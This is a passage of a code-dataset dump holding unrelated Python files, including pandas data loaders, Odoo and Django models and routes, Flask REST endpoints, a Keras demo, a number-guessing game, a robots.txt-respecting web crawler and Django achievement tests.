key=lambda y: nb <= y[0])[1]\n if nb <= list(settings.EXPOSITION[type])[-1]\n else 5\n )\n\n\ndef print_row(x):\n print(x)\n\n\ndef mapSexeToCode(x):\n m = {\"Hommes\": 1, \"Femmes\": 2}\n return m[x]\n\n\ndef load_excel_to_df(_settings: Dict, path=None) -> pd.DataFrame:\n fpath = (\n find_file(settings.DATA_FOLDER, _settings[\"source\"][\"pattern\"])\n if not path\n else path\n )\n # fix bug in pandas when setting type for index (see https://github.com/pandas-dev/pandas/issues/35816)\n read_excel_settings = _settings[\"read_excel\"]\n index_col = read_excel_settings.get(\"index_col\")\n dtype = read_excel_settings.get(\"dtype\")\n cast_str_index = False\n if index_col and dtype and dtype[index_col] == str:\n cast_str_index = True\n if cast_str_index:\n del read_excel_settings[\"index_col\"]\n args = {**{\"io\": fpath}, **read_excel_settings}\n df = pd.read_excel(**args)\n if cast_str_index:\n df.set_index(index_col, drop=True, inplace=True)\n return df\n\n\ndef load_csv_to_df(_settings: Dict, path=None) -> pd.DataFrame:\n fpath = (\n find_file(settings.DATA_FOLDER, _settings[\"source\"][\"pattern\"])\n if not path\n else path\n )\n # fix bug in pandas when setting type for index (see https://github.com/pandas-dev/pandas/issues/35816)\n read_csv_settings = _settings[\"read_csv\"]\n index_col = read_csv_settings.get(\"index_col\")\n dtype = read_csv_settings.get(\"dtype\")\n cast_str_index = False\n if index_col and dtype and dtype[index_col] == str:\n cast_str_index = True\n if cast_str_index:\n del read_csv_settings[\"index_col\"]\n args = {**{\"filepath_or_buffer\": fpath}, **read_csv_settings}\n df = pd.read_csv(**args)\n if cast_str_index:\n df.set_index(index_col, drop=True, inplace=True)\n return df\n\n\ndef filter_row_low_value(row, **kwargs):\n cols = kwargs[\"cols\"]\n for col in cols:\n if row[col] < settings.FILTER_THREESHOLD:\n row[col] = None\n return row\n\n\ndef filter_df_on_low_values(df: pd.DataFrame, cols: List) -> pd.DataFrame:\n return df.apply(axis=1, func=filter_row_low_value, cols=cols)\n\n\ndef filter_serie_on_low_values(serie: pd.Series) -> pd.Series:\n return serie.transform(lambda x: x if x >= settings.FILTER_THREESHOLD else None)\n\n\ndef get_total_exposition_level(serie: pd.Series, type: str) -> int:\n return get_exposition_level(serie.sum() / serie.size, type=type)\n","sub_path":"create_database/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249237744","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, exceptions\n\n \nclass Activity(models.Model):\n _name = \"proyectosge.activity\"\n \n date = fields.Date(default=fields.Date.today)\n description = fields.Char(required=True)\n duration = fields.Float(digits=(2,1), help=\"Duration in hours\")\n remarks = fields.Text(required=True)\n \n owner = fields.Many2one('res.users', string=\"Pupil\",default=lambda self: self.env.user,readonly=True)\n \n\n @api.constrains('duration')\n def _check_duration_not_too_long(self):\n for r in self:\n if r.duration > 8:\n raise exceptions.ValidationError(\"A activity can´t be more than 8 hours\")\n \n @api.constrains('duration')\n def _check_duration_not_too_short(self):\n for r in self:\n if r.duration < 0:\n raise exceptions.ValidationError(\"A activity can´t be less than 0 hours \")\n \n @api.constrains('duration')\n def _check_total_duration(self):\n total_duration = 0\n for activity in self.search([('owner','=',self.owner.id)]):\n total_duration = total_duration + activity.duration\n if total_duration > 350:\n raise exceptions.ValidationError('Maximum duration of all the activities can´t be more than 350 hours.')\n \n @api.constrains('duration')\n def _check_day_duration(self):\n day_duration = 0\n for activity in self.search([('date','=',self.date)]):\n day_duration = day_duration + activity.duration\n if day_duration > 8:\n raise exceptions.ValidationError('Maximum duration per day can´t be more than 8 hours.')\n# \n \n \n\n\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135134809","text":"# third-party imports\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required, current_identity\n\n# local imports\nfrom flask_todo.models.user import UserModel\nfrom flask_todo.models.task import TaskModel\nfrom flask_todo import db\n\nINCOMING_DATE_FMT = '%d/%m/%Y %H:%M:%S'\n\nclass TaskList(Resource):\n @jwt_required()\n def get(self):\n \"\"\"List all of the tasks for one user.\"\"\"\n username = current_identity\n return {'Tasks': [task.to_dict()for task in username.tasks]}\n\n\nclass CreateTask(Resource):\n @jwt_required()\n def post(self):\n username = current_identity\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=True, help=\"This field cannot be blank!\")\n parser.add_argument('note', required=True, help=\"This field cannot be blank!\")\n parser.add_argument('due-date', help=\"This field cannot be blank!\")\n parser.add_argument('completed', help=\"This field cannot be blank!\")\n data = parser.parse_args()\n try:\n task = TaskModel(name=data['name'], note=data['note'],user=username) \n task.save_to_db()\n return task.to_dict(), 201\n except:\n return {'message': 'Something wrong happend.'}, 400\n\n\nclass Task(Resource):\n @jwt_required()\n def get(self, task_id):\n \"\"\"Get the detail for one task if that task belongs to the provided user.\"\"\"\n task = TaskModel.query.filter_by(id=task_id).first()\n current_user_tasks = current_identity.tasks\n if task and task in current_user_tasks:\n return task.to_dict()\n return {'message': 'Task not found'}, 404\n\n def put(self, task_id):\n \"\"\"Update one task if that task belongs to the provided user.\"\"\"\n pass\n\n @jwt_required()\n def delete(self, task_id):\n \"\"\"Delete one task if that task belongs to the provided user.\"\"\"\n task = TaskModel.query.filter_by(id=task_id).first()\n current_user_tasks = current_identity.tasks\n if task and task in current_user_tasks:\n task.delete_from_db()\n return {'message': f'Task {task_id} has been deleted.'}, 201\n return {'message': 'Task not found'}, 404\n","sub_path":"flask_todo/resources/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"146887419","text":"import numpy as np\nimport keras as k\n\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\n\n# data\nx_train = np.random.random((1000, 20))\ny_train = k.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)\nx_test = np.random.random((100, 20))\ny_test = k.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)\n\n# model\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=20, activation=\"relu\"))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(64, activation=\"relu\"))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(10, activation=\"softmax\"))\n\nsgd = SGD(lr=0.01, momentum=0.9, nesterov=True)\nmodel.compile(optimizer=sgd, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\nhistory = model.fit(x_train, y_train, batch_size=50, epochs=2)\nscore = model.evaluate(x_test, y_test, batch_size=50)\nprint(score)\n","sub_path":"test_keras_sequential.py","file_name":"test_keras_sequential.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"8930427","text":"\n\nimport random\n\nMAX_GUESSES = 5\nSTART, END = 1,20\n\ndef get_random_number():\n return random.randint(START,END)\n\n\nclass Game:\n\n def __init__(self):\n\n self._guesses = set()\n self._answer = get_random_number()\n self._win = False\n\n def guess(self):\n guess = input(f\"Zgadnij liczbe miedzy {START} i {END}: \")\n\n try:\n guess = int(guess)\n except ValueError:\n raise ValueError(\"Should be a number\")\n\n if guess not in range(START, END+1):\n raise ValueError(\"Number not in range\")\n\n if guess in self._guesses:\n raise ValueError(\"Already guessed!\")\n\n self._guesses.add(guess)\n\n return guess\n\n\n def _validate_guess(self,guess):\n\n if guess == self._answer:\n print(f\"{guess} jest prawidlowa odpowiedzia! Wygrales zycie\")\n return True\n else:\n za_duzo_za_malo = \"low\" if guess < self._answer else \"high\"\n print(f\"{guess} is too {za_duzo_za_malo}\")\n return False\n\n @property\n def num_guesse(self):\n return len(self._guesses)\n\n def __call__(self):\n\n while len(self._guesses) < MAX_GUESSES:\n\n try:\n guess = self.guess()\n except ValueError as ve:\n print(ve)\n continue\n win = self._validate_guess(guess)\n\n\n if win:\n guess_str = \"guess\" if self.num_guesse == 1 else \"guesses\"\n print(f'It took you {self.num_guesse} {guess_str}')\n self._win = True\n break\n else:\n print(f\"you lost, hera are your wrong choices {self._guesses}\")\n print(f\"Guesses {MAX_GUESSES} times, answer was {self._answer}\")\n \n\n\nif __name__ == \"__main__\":\n gra = Game()\n gra()","sub_path":"4_Pytest_Exercice_Days_10_12/game_November272019.py","file_name":"game_November272019.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157913259","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'viz'\nurlpatterns = [\n\turl(r'^$', views.viz, name='viz'),\n\turl(r'^viz/$', views.viz_overview, name='viz_overview'),\n\turl(r'^viz/results-bar/$', views.viz_results_bar, name='viz_results_bar'),\n\turl(r'^viz/results-map/$', views.viz_results_map, name='viz_results_map'),\n\turl(r'^viz/results-mapnrw13/$', views.viz_results_mapnrw13, name='viz_results_mapnrw13'),\n\turl(r'^viz/results-mapcanvas/$', views.viz_results_mapcanvas, name='viz_results_mapcanvas'),\n\turl(r'^viz/results-timeseries', views.viz_results_timeseries, name='viz_results_timeseries'),\n\turl(r'^computing/', views.computing, name='computing'),\n\turl(r'^waiting/', views.waiting, name='waiting'),\n\turl(r'^test/', views.test, name='test'),\n\turl(r'^data/nrw13.csv$', views.serve_nrw13_csv, name='serve_nrw13_csv'),\n\turl(r'^api/$', views.api, name='api'),\n\turl(r'^api/result/$', views.api_result, name='api_result'),\n\turl(r'^api/result/nrw13/$', views.api_result_nrw13, name='api_result_nrw13'),\n\turl(r'^api/result/nrw17/$', views.api_result_nrw17, name='api_result_nrw17'),\n\turl(r'^api/base/$', views.api_base_party, name='api_base_party'),\n\turl(r'^api/base/election/$', views.api_base_election, name='api_basedata_election'),\n\turl(r'^api/base/municipality/$', views.api_base_municipality, name='api_base_municipality'),\n\turl(r'^api/base/pollingstation/$', views.api_base_pollingstation, name='api_base_pollingstation'),\n\turl(r'^api/base/list/$', views.api_base_list, name='api_basedata_list'),\n\turl(r'^api/base/party/$', views.api_base_party, name='api_basedata_party'),\n\turl(r'^api/base/list/$', views.api_base_list, name='api_basedata_list'),\n\turl(r'^api/base/state/$', views.api_base_state, name='api_base_state'),\n\turl(r'^api/base/district/$', views.api_base_district, name='api_base_district'),\n\turl(r'^api/base/regionalelectoraldistrict/$', views.api_base_red, name='api_base_red'),\n\turl(r'^api/raw/$', views.api_rawdata, name='api_rawdata'),\n\turl(r'^api/geom/$', views.api_geom, name='api_geom'),\n]","sub_path":"src/viz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257193286","text":"from flask import render_template, request, session, url_for, redirect\nfrom application import app\nfrom application.models import user_manager\n\n@app.route('/find_user', methods=['GET', 'POST'])\ndef find_user():\n\tif request.method == 'POST':\n\t\tsearch_string = request.form['search_string']\n\t\tif len(search_string) == 0:\n\t\t\tresult = []\n\t\telse: \n\t\t\tresult = user_manager.get_user_by_username(search_string)\n\t\treturn render_template('find_user_ajax.html', result=result)\n\tme = user_manager.get_user(session['user_id'])\n\treturn render_template('follow.html', me=me)\n\n\n@app.route('/follow/')\ndef follow(followee_id):\n\tuser_manager.add_follow({\n\t\t'follower_id' : session['user_id'],\n\t\t'followee_id' : followee_id\n\t})\n\treturn redirect(url_for('find_user'))\n\n","sub_path":"application/controllers/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358188123","text":"import csv\n\nclass CsvReader():\n\n\tdef __init__(self, filename, sep=',', header=False, skip_top=0, skip_bottom=0):\n\t self.filename = filename\n\t self.sep = sep\n\t self.has_header = header\n\t self.skip_top = skip_top\n\t self.skip_bottom = skip_bottom\n\t self.file = None\n\t self.data = None\n\t self.header = None\n\n\tdef __enter__(self):\n\t try:\n\t self.file = open(self.filename, \"r\")\n\t except:\n\t print(\"file not found\")\n\t return(self)\n\t print(\"Opened\")\n\t \n\t reader = csv.reader(self.file, delimiter = self.sep)\n\t for truc in range(self.skip_top):\n\t next(reader)\n\t if self.has_header:\n\t self.header = next(reader)\n\t self.data = [line for line in reader]\n\t if self.skip_bottom:\n\t self.data = self.data[:-self.skip_bottom]\n\t #check if file is corrupted --> does not work\n\t num = len(self.data[0])\n\t print(num)\n\t for line in self.data:\n\t if len(line) != num:\n\t return(None)\n\t return(self)\n\n\tdef __exit__(self, exc_type, exc_value, exc_traceback):\n\t if self.data != None:\n\t print(\"Closed\")\n\t self.file.close()\n\n\tdef getdata(self):\n return(self.data)\n\n\tdef getheader(self):\n\t return(self.header)\n\nwith CsvReader('bad.csv', header = True, skip_top = 0, skip_bottom = 1) as csv_file:\n data = csv_file.getdata()\n header = csv_file.getheader()\n print(\"header: \\n\" + str(header) + \"\\n\")\n if data:\n for lines in data:\n print(lines)\n","sub_path":"d02/ex03/csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"365894613","text":"# -----------------------------------------------------------------------------\n# Name: crawler.py\n# Purpose: simple web crawler\n#\n# Author: Bradley Thurston\n# -----------------------------------------------------------------------------\n\"\"\"\nimplement a simple web crawler\n\nUsage: crawler.py seed_url\nseed: absolute url - the crawler will use it as the initial web address\n\"\"\"\n\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport urllib.robotparser\nimport re\nimport sys\n\nMAX_URLS = 10\n\n\ndef ok_to_crawl(absolute_url):\n \"\"\"\n check if it is OK to crawl the specified absolute url\n\n Polite crawling by checking the robots.txt file for all urls except the\n ones using the file scheme (urls on the local host -- all OK to crawl)\n Skips over mailto: links and javascript: links.\n\n Parameter:\n absolute_url (string): absolute url to crawl\n Returns:\n boolean: True if the scheme is file (it is a local webpage)\n True if successfully read the corresponding robots.txt\n file and determined that user-agent * is allowed to crawl\n False if it is a mailto: link or a javascript: link\n if user-agent * is not allowed to crawl it or\n if it is NOT an absolute url.\n \"\"\"\n if absolute_url.lower().startswith('mailto:'):\n return False\n if absolute_url.lower().startswith('javascript:'):\n return False\n link_obj=urllib.parse.urlparse(absolute_url)\n if link_obj.scheme.lower().startswith('file'):\n return True\n # check if the url given as input is an absolute url\n if not link_obj.scheme or not link_obj.hostname:\n print('Not a valid absolute url: ', absolute_url)\n return False\n #construct the robots.txt url from the scheme and host name\n else:\n robot_url= link_obj.scheme+'://'+link_obj.hostname + '/robots.txt'\n rp = urllib.robotparser.RobotFileParser()\n rp.set_url(robot_url)\n try:\n rp.read()\n except:\n print (\"Error accessing robot file: \", robot_url)\n return False\n else:\n return rp.can_fetch(\"*\", absolute_url)\n\n\ndef crawl(seed_url):\n \"\"\"\n start with the seed_url and crawl up to 10 urls\n\n Parameter:\n seed_url (string) - this is the first url to visit.\n Returns:\n set of strings - set of all the urls visited.\n \"\"\"\n urls_tocrawl = {seed_url} # initialize set of urls to crawl\n urls_visited = set() # initialize set of urls visited\n while urls_tocrawl and len(urls_visited) < MAX_URLS:\n current_url= urls_tocrawl.pop() # get url from the set\n if current_url not in urls_visited: # check if it has been crawled\n page = get_page(current_url)\n if page:\n more_urls = extract_links(current_url, page) # get the links\n urls_tocrawl = urls_tocrawl | more_urls # add them\n urls_visited.add(current_url)\n return urls_visited\n\n\ndef get_page(url):\n \"\"\"\n takes an absolute url as input parameter\n returns a string that contains the web page\n Assume the web page uses utf-8 encoding.\n\n If there is an error opening the url or decoding the content,\n # print a message identifying the url and the error and\n # return an empty string.\n \"\"\"\n\n text = \"\"\n try:\n with urllib.request.urlopen(url) as page:\n text = page.read().decode('UTF-8')\n except urllib.error.URLError as url_error:\n print(\"Error opening url: \", url, url_error)\n except UnicodeDecodeError as decode_error:\n print(\"Error decoding url: \", url, decode_error)\n\n return text\n\n\ndef extract_links(base_url, page):\n \"\"\"\n extract the links contained in the page at the base_url\n Parameters:\n base_url (string): the url currently crawling - web address\n page(string): the content of that url - html\n Returns:\n A set of absolute urls (set of strings) - These are all the urls extracted\n from the current url and converted to absolute urls.\n\n \"\"\"\n url_set = set()\n url_pattern = r'0 and event.KeyCode<255: # a character\n \n v=self.cellbox.GetValue()\n r,c=self.grid.GetGridCursorRow(),self.grid.GetGridCursorCol()\n\n\n if event.KeyCode==13: # return\n self.grid[r,c]=v\n self.grid.SetFocus()\n elif event.KeyCode==27: # escape\n self.cellbox.SetValue(\"\")\n self.grid.SetFocus()\n\n event.Skip()\n \n\n def CloseWindow(self,event):\n self.Close()\n\n def OnSelectCell(self,event):\n r,c=event.Row,event.Col\n self.cellbox.SetValue(self.grid[r,c])\n event.Skip()\n \n \n\nif __name__==\"__main__\":\n app = Application(MainFrame, title=\"Grid\")\n app.Run()\n","sub_path":"waxy/demos/Grid2.py","file_name":"Grid2.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280074657","text":"#!/home/bespontoff/PycharmProjects/checkio/venv/bin/checkio --domain=py run unfair-dice\n\n# For this task, you'regoingto play a dice game, but first you must prepare for an overwhelming victory. The game itself is very simple. Both players roll a single die and whoever rolls highest scores a point. (On a tie, both players must reroll until someone scores.)\n# \n# These aren't standard dice however. Each player can put any positive number on any side of the die as long as the number of sides match and the total of all the chosen numbers are the same. For example, one player might use a six sided die with the numbers [3, 3, 3, 3, 6, 6] while the other player uses a six sided die with the numbers [4, 4, 4, 4, 4, 4]. The interesting part of this game is that even with the same number of sides and the same total, different dice have different chances of winning. Using the example die, the player with all 4's will win 2/3 of the time.\n# \n# To prepare for this game, you're investigating different ways of picking the numbers. To do this, write a program that will take an opponent's die and output some die which will win against it more than half the time. If no die satisfies the task requirements, return an empty list.\n# \n# Input:An enemy's die as a sorted list of integers, one for each face of the opponent's die.\n# \n# Output:Your die as a list of integers, one for each face of your die or an empty list.\n# \n# Example:\n# \n# \n# winning_die([3, 3, 3, 3, 6, 6]) == [4, 4, 4, 4, 4, 4] # Or [3, 3, 4, 4, 5, 5]\n# winning_die([4, 4, 4, 4, 4, 4]) == [2, 2, 5, 5, 5, 5] # Or [5, 5, 2, 2, 5, 5]\n# winning_die([2, 2, 5, 5, 5, 5]) == [3, 3, 3, 3, 6, 6]\n# winning_die([1, 1, 3]) == [1, 2, 2]\n# winning_die([1, 2, 3, 4, 5, 6]) == [] # Any 6-sided die totaling 21 has a 50/50 chance of winning against the standard die.\n# winning_die([2, 3, 4, 5, 6, 7]) == [1, 1, 3, 7, 7, 8] # This can be beat though.\n# winning_die([1, 2, 3, 4, 5, 6]) == []\n# Preconditions:\n# 3 ≤ len(die) ≤ 10\n# sum(die) ≤ 100\n# min(die) ≥ 1\n# max(die) ≤ 18\n# \n# \n# END_DESC\n\ndef winning_die(enemy_die):\n return []\n\nif __name__ == '__main__':\n #These are only used for self-checking and not necessary for auto-testing\n def check_solution(func, enemy):\n player = func(enemy)\n total = 0\n for p in player:\n for e in enemy:\n if p > e:\n total += 1\n elif p < e:\n total -= 1\n return total > 0\n\n assert check_solution(winning_die, [3, 3, 3, 3, 6, 6]), \"Threes and Sixes\"\n assert check_solution(winning_die, [4, 4, 4, 4, 4, 4]), \"All Fours\"\n assert check_solution(winning_die, [1, 1, 1, 4]), \"Unities and Four\"\n assert winning_die([1, 2, 3, 4, 5, 6]) == [], \"All in row -- No die\"","sub_path":"solutions/Codeship/unfair_dice.py","file_name":"unfair_dice.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595106652","text":"from parliament import Context\nimport logging\nimport json\n\nfrom model_process import ModelProcessor\n\ndef main(context: Context):\n \"\"\" \n Function template\n The context parameter contains the Flask request object and any\n CloudEvent received with the request.\n \"\"\"\n #\n # Debug output.\n #\n logging.warning(f'')\n logging.warning(f'')\n logging.warning(f'**************************************************************')\n logging.warning(f'************** main() called.')\n\n # helper to process the model\n modelprocessor = ModelProcessor()\n\n # get json data from request or cloud event\n # attempt to get data from HTTP Request or cloud event\n if hasattr(context, \"cloud_event\") and hasattr(context.cloud_event, \"data\"):\n data = context.cloud_event.data\n elif hasattr(context, \"request\"):\n data = json.loads(context.request.get_data())\n else : \n data = context #assume this is from test...\n logging.warning(f'************** data from request: {data}')\n\n #convert to index then creating data frame\n jsondata = json.loads(\"[\" + json.dumps(data) + \"]\") #convert to string first\n raw = modelprocessor.createDataFrame(jsondata)\n logging.warning(f'************** \"[INFO] raw dataframe... {raw}') \n\n # # load pipeline and model \n pipeline, model = modelprocessor.load(pipelinePath = \"pipeline.pkl\", modelPath = \"xgbc_model.pkl\") \n\n # get results\n results = modelprocessor.transformAndPredict(raw, pipeline, model, dropNonBioMarkers = False )\n # there should only be one\n for index, row in results.iterrows():\n issepsis = row[\"issepsis\"]\n\n # return results\n body = { \"issepsis\": int(issepsis) }\n #headers = { \"content-type\": \"application/json\" }\n logging.warning(f'************** \"[INFO] prediction... {body}') \n return { \"issepsis\": int(issepsis) }, 200 \n #return body, 200 , headers\n","sub_path":"serving/fn/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405640215","text":"# coding: utf-8\nfrom unittest import mock\n\nfrom the_tale.amqp_environment import environment\n\nfrom the_tale.common.utils import testcase\nfrom the_tale.common.utils.permissions import sync_group\n\nfrom the_tale.accounts import logic as accounts_logic\n\nfrom the_tale.accounts.personal_messages import tt_api as pm_tt_api\nfrom the_tale.accounts.personal_messages.tests import helpers as pm_helpers\n\nfrom the_tale.accounts.achievements.relations import ACHIEVEMENT_GROUP, ACHIEVEMENT_TYPE\nfrom the_tale.accounts.achievements.prototypes import AchievementPrototype, AccountAchievementsPrototype, GiveAchievementTaskPrototype\n\nfrom the_tale.game.heroes import logic as heroes_logic\n\n\nfrom the_tale.game.logic import create_test_map\n\n\n\nclass AchievementsManagerTests(testcase.TestCase, pm_helpers.Mixin):\n\n def setUp(self):\n super(AchievementsManagerTests, self).setUp()\n\n create_test_map()\n\n self.account_1 = self.accounts_factory.create_account()\n self.account_2 = self.accounts_factory.create_account()\n\n group_edit = sync_group('edit achievement', ['achievements.edit_achievement'])\n\n group_edit.user_set.add(self.account_2._model)\n\n self.achievement_1 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.MONEY, type=ACHIEVEMENT_TYPE.MONEY, barrier=0, points=10,\n caption='achievement_1', description='description_1', approved=True)\n self.achievement_2 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.MONEY, type=ACHIEVEMENT_TYPE.MONEY, barrier=5, points=10,\n caption='achievement_2', description='description_2', approved=False)\n self.achievement_3 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.TIME, type=ACHIEVEMENT_TYPE.DEATHS, barrier=4, points=10,\n caption='achievement_3', description='description_3', approved=True)\n\n\n self.account_achievements_1 = AccountAchievementsPrototype.get_by_account_id(self.account_1.id)\n self.account_achievements_1.achievements.add_achievement(self.achievement_1)\n self.account_achievements_1.save()\n\n self.worker = environment.workers.achievements_manager\n self.worker.initialize()\n\n pm_tt_api.debug_clear_service()\n\n def test_add_achievements__not_tasks(self):\n self.worker.add_achievements()\n self.account_achievements_1.reload()\n self.assertEqual(len(self.account_achievements_1.achievements), 1)\n\n def test_add_achievements(self):\n GiveAchievementTaskPrototype.create(account_id=self.account_1.id, achievement_id=self.achievement_3.id)\n self.assertFalse(self.account_achievements_1.has_achievement(self.achievement_3))\n\n with self.check_new_message(self.account_1.id, [accounts_logic.get_system_user_id()]):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n\n @mock.patch('the_tale.accounts.achievements.storage.AchievementsStorage.verify_achievements', lambda *argv, **kwargs: None)\n def test_add_achievements__all_accounts(self):\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=self.achievement_3.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertFalse(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n hero = heroes_logic.load_hero(account_id=self.account_1.id)\n hero.statistics.change_pve_deaths(self.achievement_3.barrier)\n heroes_logic.save_hero(hero)\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n @mock.patch('the_tale.accounts.achievements.storage.AchievementsStorage.verify_achievements', lambda *argv, **kwargs: None)\n def test_add_achievements__all_accounts__not_remove_already_received_achievements(self):\n self.account_achievements_1.achievements.add_achievement(self.achievement_3)\n self.account_achievements_1.save()\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=self.achievement_3.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n def test_legendary_achievements(self):\n achievement_4 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.LEGENDS, type=ACHIEVEMENT_TYPE.LEGENDS, barrier=0, points=0,\n caption='achievement_4', description='description_4', approved=True)\n\n self.account_achievements_1.achievements.add_achievement(achievement_4)\n self.account_achievements_1.save()\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=achievement_4.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertTrue(self.account_achievements_1.has_achievement(achievement_4))\n self.assertFalse(account_achievements_2.has_achievement(achievement_4))\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(achievement_4))\n self.assertFalse(account_achievements_2.has_achievement(achievement_4))\n\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n","sub_path":"src/the_tale/the_tale/accounts/achievements/tests/test_achievements_manager.py","file_name":"test_achievements_manager.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"446052044","text":"if __name__ == '__main__':\n\tn = int(input())\n\tarr = [int(x) for x in input().split()]\n\n\tarr.sort(reverse=True)\n\ttemp = arr[0]\n\tfor i in arr:\n\t\tif temp > i:\n\t\t\ttemp =i\n\t\t\tbreak\n\n\tprint (temp)","sub_path":"Hackerrank/Hacker8-SecondLargestNumber.py","file_name":"Hacker8-SecondLargestNumber.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117028565","text":"from datetime import datetime, timedelta\nimport pandas as pd\nfrom IPython import embed\n\n\ndef split_train_valid_test(args, df, df_inv, inv_dummy_diff,\n test_start_datetime, eval_span):\n test_end_datetime = test_start_datetime + \\\n timedelta(days=eval_span)\n valid_start_datetime = test_start_datetime - \\\n timedelta(days=eval_span)\n valid_end_datetime = test_start_datetime\n train_end_datetime = valid_start_datetime\n\n first_day = df.index[0]\n train_start_datetime = datetime(first_day.year, first_day.month, first_day.day)\n\n df_train_start = df.index.get_loc(train_start_datetime)\n df_train_end = df.index.get_loc(train_end_datetime)\n df_train = df.iloc[df_train_start:df_train_end, :]\n\n df_valid_start = df.index.get_loc(valid_start_datetime)\n df_valid_end = df.index.get_loc(valid_end_datetime)\n df_valid = df.iloc[df_valid_start:df_valid_end, :]\n\n df_test_start = df.index.get_loc(test_start_datetime)\n df_test_end = df.index.get_loc(test_end_datetime)\n df_test = df.iloc[df_test_start:df_test_end, :]\n\n df_train = decimate_nonzero_train_data(df_train, df_test)\n df_train = decimate_past_train_data(args, df_train)\n\n # inverse\n train_inv_start_datetime = train_end_datetime - \\\n timedelta(days=inv_dummy_diff)\n train_inv_end_datetime = train_start_datetime - \\\n timedelta(days=inv_dummy_diff)\n df_inv_start = df_inv.index.get_loc(train_inv_start_datetime)\n df_inv_end = df_inv.index.get_loc(train_inv_end_datetime)\n df_inv_train = df_inv.iloc[df_inv_start:df_inv_end, :]\n df_inv_train = decimate_nonzero_train_data(df_inv_train, df_test)\n df_inv_train = decimate_past_train_data(args, df_inv_train)\n df_train = pd.concat([df_inv_train, df_train])\n\n df_train = df_train.sample(frac=1, random_state=42)\n X_train = df_train.iloc[:, :-1]\n y_train = df_train.iloc[:, -1]\n\n X_valid = df_valid.iloc[:, :-1]\n y_valid = df_valid.iloc[:, -1]\n\n X_test = df_test.iloc[:, 